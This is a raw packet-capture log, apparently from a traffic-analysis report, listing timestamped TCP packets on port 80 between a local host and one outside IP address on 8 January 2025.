                                                                                        Jan 8, 2025 18:08:51.531589985 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531599045 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531629086 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531636953 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531693935 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531702995 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531747103 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531764984 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531819105 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538314104 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538324118 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538331985 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538340092 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538348913 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538357973 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538373947 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538383007 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538389921 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538399935 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.706403017 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.780636072 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:52.443547964 CET5002280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:52.443780899 CET5002080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:52.448326111 CET8050022185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:52.448709011 CET8050020185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:52.448790073 CET5002080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:52.448811054 CET5002280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:52.448947906 CET5002280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:52.453851938 CET8050022185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:52.537020922 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:52.586250067 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:52.796385050 CET5002280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:52.801294088 CET8050022185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:52.801304102 CET8050022185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:52.801311970 CET8050022185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:53.164057016 CET8050022185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:53.280539989 CET5002280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:53.300460100 CET8050022185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:53.468091965 CET5002280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:53.684676886 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:53.684752941 CET5002280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:53.685240030 CET5002380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:53.689985037 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:53.690033913 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:53.690057039 CET8050023185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:53.690121889 CET5002380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:53.690248966 CET8050022185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:53.690299034 CET5002280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:53.690413952 CET5002380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:53.695205927 CET8050023185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:54.416863918 CET8050023185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:54.612365961 CET5002380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:54.803852081 CET5002380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:54.808742046 CET8050023185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:54.808753967 CET8050023185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:54.808762074 CET8050023185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:55.180402994 CET5002480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:55.185705900 CET8050024185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:55.185765982 CET5002480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:55.185939074 CET5002480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:55.190701008 CET8050024185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:55.530749083 CET5002480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:55.535712004 CET8050024185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:55.535808086 CET8050024185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:55.588704109 CET8050023185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:55.718029976 CET5002380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:55.794926882 CET5002380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:55.795243979 CET5002580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:55.799983978 CET8050023185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:55.800039053 CET5002380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:55.800050974 CET8050025185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:55.800111055 CET5002580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:55.800228119 CET5002580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:55.804977894 CET8050025185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:55.856637955 CET8050024185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:55.932945967 CET5002480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:55.990760088 CET8050024185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:56.077438116 CET5002480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:56.162477016 CET5002580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:56.167340040 CET8050025185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:56.167352915 CET8050025185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:56.167361021 CET8050025185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:56.483486891 CET8050025185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:56.614466906 CET8050025185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:56.614969969 CET5002580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:56.890724897 CET5002480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:56.890908003 CET5002580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:56.891566992 CET5002680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:56.895783901 CET8050024185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:56.895843983 CET5002480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:56.896166086 CET8050025185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:56.896294117 CET5002580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:56.896353006 CET8050026185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:56.896440983 CET5002680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:56.896548986 CET5002680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:56.902703047 CET8050026185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:57.260790110 CET5002680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:57.265729904 CET8050026185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:57.265743971 CET8050026185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:57.265752077 CET8050026185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:57.600389004 CET8050026185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:57.718080044 CET5002680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:57.738435984 CET8050026185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:57.883446932 CET5002680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:57.883768082 CET5002780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:57.888427019 CET8050026185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:57.888516903 CET5002680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:57.888600111 CET8050027185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:57.888716936 CET5002780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:57.888900042 CET5002780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:57.893687010 CET8050027185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:58.253427982 CET5002780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:58.258326054 CET8050027185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:58.258341074 CET8050027185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:58.258351088 CET8050027185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:58.572508097 CET8050027185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:58.710448027 CET8050027185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:58.710639000 CET5002780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:59.769787073 CET5002780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:59.770402908 CET5002880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:59.775002956 CET8050027185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:59.775063038 CET5002780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:59.775154114 CET8050028185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:59.775226116 CET5002880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:59.775526047 CET5002880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:59.780314922 CET8050028185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:00.163105965 CET5002880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:00.167996883 CET8050028185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:00.168013096 CET8050028185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:00.168024063 CET8050028185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:00.448724985 CET8050028185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:00.591456890 CET8050028185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:00.591979980 CET5002880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:00.779875040 CET5002880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:00.780177116 CET5002980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:00.784868002 CET8050028185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:00.784934044 CET5002880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:00.784941912 CET8050029185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:00.785003901 CET5002980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:00.785177946 CET5002980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:00.789935112 CET8050029185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:01.012046099 CET5003080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:01.016834974 CET8050030185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:01.016930103 CET5003080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:01.017096043 CET5003080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:01.021843910 CET8050030185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:01.166233063 CET5002980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:01.171123981 CET8050029185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:01.171137094 CET8050029185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:01.171145916 CET8050029185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:01.374419928 CET5003080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:01.379241943 CET8050030185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:01.379362106 CET8050030185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:01.472929955 CET8050029185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:01.611773014 CET8050029185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:01.616985083 CET5002980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:01.709126949 CET8050030185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:01.780531883 CET5003080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:01.846863985 CET8050030185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:01.983700037 CET5003080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:02.673832893 CET5002980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:02.679169893 CET8050029185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:02.679231882 CET5002980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:02.682526112 CET5003080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:02.687408924 CET8050030185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:02.687455893 CET5003080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:02.689893961 CET5003180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:02.694669008 CET8050031185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:02.694753885 CET5003180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:02.700252056 CET5003180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:02.705060959 CET8050031185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:03.049895048 CET5003180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:03.054789066 CET8050031185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:03.054805040 CET8050031185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:03.054816961 CET8050031185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:03.358908892 CET8050031185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:03.436759949 CET5003180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:03.490603924 CET8050031185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:03.608680010 CET5003180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:04.675870895 CET5003180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:04.676331997 CET5003280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:04.680912018 CET8050031185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:04.680965900 CET5003180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:04.681130886 CET8050032185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:04.681200981 CET5003280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:04.681320906 CET5003280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:04.686075926 CET8050032185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:05.035536051 CET5003280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:05.040407896 CET8050032185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:05.040421009 CET8050032185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:05.040431023 CET8050032185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:05.373123884 CET8050032185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:05.421149969 CET5003280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:05.506798983 CET8050032185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:05.608696938 CET5003280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:05.654254913 CET5003280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:05.654493093 CET5003380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:05.659354925 CET8050032185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:05.659368992 CET8050033185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:05.659425974 CET5003280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:05.659457922 CET5003380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:05.682055950 CET5003380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:05.686855078 CET8050033185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:06.030735016 CET5003380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:06.035624981 CET8050033185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:06.035640001 CET8050033185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:06.035650969 CET8050033185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:06.344084024 CET8050033185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:06.431709051 CET5003380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:06.684874058 CET8050033185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:06.703893900 CET8050033185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:06.704011917 CET5003380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:06.842772007 CET5003380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:06.843384981 CET5003480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:06.847798109 CET8050033185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:06.848000050 CET5003380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:06.848196983 CET8050034185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:06.848269939 CET5003480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:06.848376989 CET5003480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:06.853092909 CET8050034185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:07.202800989 CET5003480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:07.220439911 CET5003580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:07.237667084 CET8050034185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:07.237771988 CET8050034185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:07.238282919 CET8050034185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:07.238295078 CET8050035185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:07.238383055 CET5003580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:07.238653898 CET5003580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:07.243473053 CET8050035185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:07.524365902 CET8050034185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:07.577440977 CET5003480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:07.593512058 CET5003580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:07.598321915 CET8050035185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:07.598493099 CET8050035185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:07.656455040 CET8050034185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:07.716927052 CET5003480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:07.788615942 CET5003480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:07.791898012 CET5003680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:07.793661118 CET8050034185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:07.793740988 CET5003480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:07.796747923 CET8050036185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:07.796821117 CET5003680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:07.798317909 CET5003680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:07.803106070 CET8050036185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:07.929986954 CET8050035185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:08.014975071 CET5003580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:08.062575102 CET8050035185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:08.164318085 CET5003680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:08.169310093 CET8050036185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:08.169323921 CET8050036185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:08.169332027 CET8050036185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:08.218044996 CET5003580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:08.469192982 CET8050036185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:08.598748922 CET8050036185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:08.598849058 CET5003680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:08.766871929 CET5003580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:08.766937971 CET5003680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:08.767263889 CET5003780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:08.772073030 CET8050035185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:08.772098064 CET8050036185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:08.772109032 CET8050037185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:08.772167921 CET5003580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:08.772198915 CET5003680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:08.772233009 CET5003780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:08.772443056 CET5003780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:08.777364016 CET8050037185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:09.162511110 CET5003780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:09.167367935 CET8050037185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:09.167386055 CET8050037185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:09.167396069 CET8050037185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:09.454893112 CET8050037185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:09.586425066 CET8050037185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:09.586494923 CET5003780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:09.703167915 CET5003780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:09.703435898 CET5003880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:09.708138943 CET8050037185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:09.708210945 CET5003780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:09.708257914 CET8050038185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:09.708328009 CET5003880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:09.708439112 CET5003880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:09.713160038 CET8050038185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.074676037 CET5003880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:10.079638004 CET8050038185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.079653978 CET8050038185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.079663038 CET8050038185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.372292042 CET8050038185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.425982952 CET5003880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:10.502743959 CET8050038185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.608671904 CET5003880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:10.624299049 CET5003880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:10.628839016 CET5003980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:10.629234076 CET8050038185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.629283905 CET5003880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:10.633647919 CET8050039185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.633716106 CET5003980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:10.635338068 CET5003980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:10.640132904 CET8050039185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.983937979 CET5003980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:10.988811016 CET8050039185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.988831997 CET8050039185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:10.988873959 CET8050039185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:11.337697983 CET8050039185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:11.470454931 CET8050039185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:11.470536947 CET5003980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:11.594988108 CET5003980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:11.595115900 CET5004080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:11.599931002 CET8050040185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:11.599946976 CET8050039185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:11.599997997 CET5004080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:11.600019932 CET5003980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:11.600148916 CET5004080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:11.604913950 CET8050040185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:11.952824116 CET5004080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:11.957709074 CET8050040185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:11.957721949 CET8050040185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:11.957731009 CET8050040185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:12.299433947 CET8050040185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:12.405592918 CET5004080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:12.432261944 CET8050040185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:12.514986992 CET5004080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:12.562753916 CET5004080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:12.563179016 CET5004180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:12.567737103 CET8050040185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:12.567799091 CET5004080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:12.568095922 CET8050041185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:12.568171978 CET5004180192.168.2.4185.177.239.66
